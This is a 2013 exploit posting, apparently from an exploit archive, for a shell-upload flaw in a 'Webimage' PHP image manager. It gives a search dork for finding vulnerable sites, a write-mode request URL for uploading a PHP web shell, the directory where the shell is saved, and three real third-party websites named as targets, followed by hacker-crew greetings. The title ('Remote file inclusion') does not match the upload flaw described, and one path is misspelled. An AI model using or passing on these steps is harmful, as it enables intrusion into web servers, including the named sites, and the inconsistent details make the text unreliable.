Home / exploits Webimage Remote Shell Upload
Posted on 08 January 2013
######################################################### # Title : Webimage Remote file inclusion # Author : Ryuzaki Lawlet # Blog : justryuz.blogspot.com / www.justryuz.com # E-mail : ryuzaki_l@y7mail.com / justryuz@facebook.com / justryuz@linuxmail.org # Date: Sat Jan 5/2013 (6.44 pm) # Vendor: - # Type : Web Apps # Tested on : Ubuntu / Window XP # Dork : inurl:/webimage/imagemanage.php & inurl:/webimage/ ########################################################## ----> Exploit http://localhost/webimage/ 0r http://localhost/path/webimage/imagemane.php??wz_apg=&wz_imgmode=write&editobj_name= Upload your shell xD... your shell path/directory at http://localhost/webimage/upimages/ your file/shell save name php.save example http://localhost/webimage/upimages/1357379114.php.save ----> Preview site http://banner.outsourcing21.com/ams/webimage/ http://www.happylasek.com/webimage/ http://www.gdsilver.co.kr/webimage/ Screenshot http://i.imgur.com/gbZ8X.png <!---- #==================================================<Greet>==================================================# # Sbkiller * Xay * HeavenSe7en * Lonely * Skiddo * Ben * DzDzul * Sykes * RedJohn * LodVViP * PhiberOptick # # KedAns-Dz * r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com) * NuxbieCyber ..all # # CyberSec Crew * Cyber 4rmy * T3D Hacker * DevilSec * RileksCrew * TBD * Newbie3vilc063rs * MyHex * GaySec # # www.1337day.com /.net /.org * packetstormsecurity.org * cxsecurity * All Security and Exploits # #===========================================================================================================#
